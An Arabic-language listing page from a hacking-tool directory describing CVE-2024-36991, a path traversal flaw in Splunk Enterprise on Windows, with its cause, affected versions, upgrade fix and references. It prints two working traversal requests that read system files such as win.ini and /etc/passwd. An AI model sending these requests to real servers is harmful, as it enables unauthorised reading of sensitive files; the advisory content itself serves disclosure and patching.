Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36991 — اجتياز المسار في نقطة النهاية "/Modules/Messaging/" في Splunk Enterprise على Windows | Kitploit
أدوات/GitHubGitHub/mr-xn/cve-2024-36991
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmr-xn/cve-2024-36991

CVE-2024-36991

اجتياز المسار في نقطة النهاية "/Modules/Messaging/" في Splunk Enterprise على Windows

عرض المستودع
91منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2024-36991

اجتياز المسار على نقطة النهاية "/Modules/Messaging/" في Splunk Enterprise على ويندوز

في إصدارات Splunk Enterprise الأقل من 9.2.2 و9.1.5 و9.0.10، يمكن للمهاجم تنفيذ اجتياز المسار على نقطة النهاية /modules/messaging/ في Splunk Enterprise على ويندوز.

توجد الثغرة لأن دالة Python os.path.join تزيل حرف محرك الأقراص من رموز المسار إذا كان محرك الأقراص في الرمز يطابق محرك الأقراص في المسار المُنشأ.

يجب أن تؤثر هذه الثغرة فقط على Splunk Enterprise على ويندوز.

الإثبات

root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

المتأثرون

المتأثر من 9.2 قبل 9.2.2

المتأثر من 9.1 قبل 9.1.5

المتأثر من 9.0 قبل 9.0.10

الحل

قم بترقية Splunk Enterprise إلى الإصدارات 9.2.2 و9.1.5 و9.0.10 أو أحدث.

الإسناد

Danylo Dmytriiev (DDV_UA)

المراجع

  • https://advisory.splunk.com/advisories/SVD-2024-0711
  • https://www.cve.org/CVERecord?id=CVE-2024-36991
تنزيل الأداة